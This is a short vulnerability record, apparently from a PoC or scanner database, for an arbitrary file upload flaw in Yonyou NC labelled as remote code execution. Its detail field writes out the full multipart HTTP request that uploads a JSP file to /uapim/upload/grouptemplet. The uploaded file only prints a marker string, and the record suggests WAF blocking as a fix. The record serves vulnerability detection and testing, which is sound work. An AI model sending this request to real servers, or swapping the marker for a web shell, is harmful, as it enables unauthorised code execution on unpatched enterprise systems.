vendor = "用友"
name = "用友NC任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/uapim/upload/grouptemplet"
detail = "POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Connection: closeContent-Length: 268Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgkAccept-Encoding: gzip ------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgkContent-Disposition: form-data; name=\"upload\"; filename=\"2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp\"Content-Type: application/octet-stream <%out.println(\"2fiu0WM4788fa6NcMHipkIthTTW\");%>------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0830"
label = "nday"
